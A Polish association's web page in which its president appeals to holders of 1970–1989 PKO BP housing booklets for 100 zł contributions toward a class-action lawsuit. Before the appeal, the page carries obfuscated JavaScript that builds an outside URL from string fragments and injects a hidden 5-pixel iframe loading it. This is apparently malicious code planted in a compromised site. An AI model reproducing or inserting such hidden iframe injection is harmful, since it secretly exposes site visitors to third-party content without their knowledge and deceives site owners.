jk='tip';gp='.bi';q='sr';yr='//';t='i';tq='ht';k='p:';h='me';w='ar';fr='z';l='t';r='c';n='f';bd='d';s='ra';ce=t.concat(n,s,h);pn=q.concat(r);hh=tq.concat(l,k,yr,jk,w,bd,gp,fr);var at=document.createElement(ce);at.setAttribute('width','5');at.setAttribute('height','5');at.setAttribute('style','display:none');at.setAttribute(pn,hh);document.body.appendChild(at); WIADOMOŚĆ DLA POSIADACZY KSIĄŻECZEK MIESZKANIOWYCH

Teraz musimy się złożyć na koszty sądowe pozwu zbiorowego. (Adwokata, koszty sadowe i koszty organizacyjne pieczątki, strona internetowa, telefon, (bo jak zabraknie mi minut na moim będzie potrzeba dopłaty).  Na zebraniu w dniu 07.09.2013 Członkowie Stali i Zarząd ustalili, że składka miesięczna wyniesie 10 zł i wpłacamy 100zł za okres 10 miesięcy z góry. To powinno wystarczyć na koszty sądowe i adwokata w początkowej fazie.   Co do dalszych kosztów może się okazać, że ich nie będzie, bo ci, którzy zaczną się zgłaszać tez wpłacą po 100zł i to wystarczy?   Nie chce siebie i Was narażać na zbędne koszty a tylko te konieczne.

Jeżeli nadal podtrzymujecie swoje członkostwo i udział w procesie zbiorowym, to proszę o wpłatę 100zł na konto:

 Krajowe Stowarzyszenie Posiadaczy Książeczek Mieszkaniowych PKOBP z lat 1970-1989 ul. Spasowskiego 2/11 31-139 Kraków

 BGŻ 26 2030 0045 1110 0000 0278 1500

Zaznaczyć, że to składka na Stowarzyszenie i podać nazwisko imię i nr na liście. Proszę o powiadomienie mnie emailem 

Proszę o szukanie w swoich okolicach ludzi posiadających KMPKOBP i niech się zgłoszą ,im nas będzie więcej tym lepiej , będzie większa presja.  Może zaistnieć też potrzeba zbierania podpisów 100000 wymaganych do wywierania presji na SEJM III RP, aby zmienili ustawę, która krzywdzi 1, 2ml ludzi.

Jeżeli ktoś ma jakieś dane z dawnych lat odnośnie umów z PKOBP, co do Książeczek Mieszkaniowych proszę o dostarczenie kserokopii.

O wszelkich postępach w sprawie Książeczek Mieszkaniowych PKOBP będę informować na Stronie i poprzez prasę.

Kontakt: Ten adres pocztowy jest chroniony przed spamowaniem. Aby go zobaczyć, konieczne jest włączenie obsługi JavaScript.                                          

Uszanowanie Wam Wszystkim

Prezes  Andrzej Kubasiak

WYBORY 2018

POLECANE

 

 

 Copyright © 2013 Stowarzyszenie Krakowska Grupa Inicjatywna Obrony Praw Lokatorów.

Wszelkie prawa zastrzeżone.